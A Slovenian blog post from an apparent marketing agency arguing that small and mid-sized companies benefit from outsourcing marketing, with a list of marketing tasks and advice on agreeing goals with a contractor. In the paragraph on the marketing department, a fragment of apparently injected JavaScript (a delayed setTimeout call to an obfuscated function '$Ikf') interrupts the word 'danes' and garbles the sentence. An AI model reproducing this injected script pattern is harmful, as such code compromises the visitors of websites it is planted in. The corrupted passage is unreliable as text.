fbpx

Kdaj predati izvajanje marketinga zunanjemu izvajalcu

Kdaj predati izvajanje marketinga zunanjemu izvajalcu

Kdaj je pravi čas, da predate izvajanje marketinga zunanjemu izvajalcu?

To bi bilo takrat, ko sami nimate dovolj sredstev, da se kvalitetno spopadete z vsemi izzivi, ki jih danes ponuja moderni marketing. Marketing je namreč postal zelo široko področje.

Oddelek marketinga se mora dandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andanes na dnevni ravni soočati z vse širšim spektrom storitev. Med glavne storitve marketing oddelka lahko štejemo:

  • skrb za prepoznavnost blagovne znamke,
  • vodenje vseh vrst oglaševalskih kampanj,
  • skrb za oglaševalski budget,
  • generiranje novih potencialnih strank,
  • skrb za kvalitetno spletno predstavitev podjetja,
  • optimizacijo za spletne brskalnike,
  • izdelavo promocijskega materiala,
  • obvladovanje tiska,
  • obvladovanje odnosa z javnostjo,
  • obvladovanje družbenih omrežij,
  • pripravo vsebin,
  • in še in še…

In v kolikor želite, da oddelek marketinga opravi svoj posel dobro, potem takem nujno potrebujete tudi dobro marketing ekipo, kar pa podjetjem pogosto predstavlja prevelik finančni zalogaj.

In kaj je alternativa?

Predaja izvajanja marketinga zunanjemu izvajalcu! Če ste mikro ali malo podjetje, potem pravzaprav niti nimate izbire, saj preprosto nimate dovolj ljudi, da bi lahko sestavili kvalitetno marketing ekipo. Zunanji izvajalec, pa je konec koncev lahko zelo dobra rešitev tudi za srednje velika in velika podjetja.

V kolikor se torej odločite za zunanjega izvajalca, vam svetujemo, da se z njim izčrpno pogovorite ter skupaj:

  • določite jasne cilje kaj želite doseči,
  • vzpostavite jasne zadolžitve obeh akterjev,
  • poiščite in definirajte stroškovne prednosti takšnega sodelovanja ter
  • določite časovne in finančne okvirje.

Kot naročnik ne rabite poznati vseh marketinških izrazov in se z izvajalcem pogovarjati na povsem tehničnem nivoju, vedeti pa morate, kakšni so vaši kratkoročni in dolgoročni cilji. So to povečanje prodaje za X%, je to povečanje prepoznavnosti blagovne znamke na določenem trgu, itd. Samo tako boste lahko izbrali pravega izvajalca, z njim dolgoročno dobro sodelovali ter dosegli vaše zadane cilje.

0 Komentarjev

Odgovori

Vaš e-naslov ne bo objavljen. * označuje zahtevana polja

*